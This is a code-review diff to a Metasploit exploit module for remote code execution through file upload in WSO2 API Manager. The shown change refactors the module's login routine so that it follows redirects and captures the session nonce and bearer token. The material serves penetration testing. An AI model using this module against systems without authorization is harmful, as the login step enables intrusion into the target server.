Merge

Author: heyder

modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb

@@ -146,72 +146,50 @@ def check
   end
 
   def authenticate
-    vprint_status('Authenticating...')
-    res = send_request_cgi(
+    nounce = nil
+
+    opts = {
       'uri' => normalize_uri(target_uri.path, '/publisher/services/auth/login'),
       'method' => 'GET',
+      'headers' => {
+        'Connection' => 'keep-alive'
+      },
       'keep_cookies' => true
-    )
-
-    fail_with(Failure::UnexpectedReply, 'Failed to authenticate') unless res
-
-    nounce = nil
-    loop_dectector = 0
-
-    while res.redirect?
-      loop_dectector += 1
-      res = send_request_cgi(
-        'uri' => "#{res.redirection.path}?#{res.redirection.query}",
-        'method' => 'GET',
-        'headers' => {
-          'Connection' => 'keep-alive'
-        },
-        'keep_cookies' => true
-      )
-
-      if res&.get_cookies && res.get_cookies.match(/sessionNonceCookie-(.*)=/)
-        vprint_status('Got session nonce')
-        nounce = ::Regexp.last_match(1)
-      end
-      break if nounce
-
-      fail_with(Failure::UnexpectedReply, 'Loop detected') if loop_dectector > 3
+    }
+    res = send_request_cgi!(opts, 20, 1) # timeout and redirect_depth
 
+    if res&.get_cookies && res.get_cookies.match(/sessionNonceCookie-(.*)=/)
+      vprint_status('Got session nonce')
+      nounce = ::Regexp.last_match(1)
     end
 
+    fail_with(Failure::UnexpectedReply, 'Failed to authenticate. Could not get session nonce') unless nounce
+
     auth_data = {
       'usernameUserInput' => datastore['HttpUsername'],
       'username' => datastore['HttpUsername'],
       'password' => datastore['HttpPassword'],
       'sessionDataKey' => nounce
     }
 
-    res = send_request_cgi(
+    opts = {
       'uri' => normalize_uri(target_uri.path, '/commonauth'),
       'method' => 'POST',
+      'headers' => {
+        'Connection' => 'keep-alive'
+      },
+      'keep_cookies' => true,
       'vars_post' => auth_data
-    )
+    }
 
-    loop_dectector = 0
-    while res.redirect?
-      loop_dectector += 1
-      res = send_request_cgi(
-        'uri' => "#{res.redirection.path}?#{res.redirection.query}",
-        'method' => 'GET',
-        'headers' => {
-          'Connection' => 'keep-alive'
-        },
-        'keep_cookies' => true
-      )
-      if res&.get_cookies && res.get_cookies.match(/:?WSO2_AM_TOKEN_1_Default=([\w|-]+);\s/)
-        self.bearer = ::Regexp.last_match(1)
-      end
-      break if bearer
+    res = send_request_cgi!(opts, 20, 1) # timeout and redirect_depth
 
-      fail_with(Failure::UnexpectedReply, 'Loop detected') if loop_dectector > 3
+    if res&.get_cookies && res.get_cookies.match(/:?WSO2_AM_TOKEN_1_Default=([\w|-]+);\s/)
+      vprint_status('Got bearer token')
+      self.bearer = ::Regexp.last_match(1)
     end
 
-    fail_with(Failure::UnexpectedReply, 'Authentication attempt failed') unless bearer
+    fail_with(Failure::UnexpectedReply, 'Authentication attempt failed. Could not get bearer token') unless bearer
 
     print_good('Authentication successful')
   end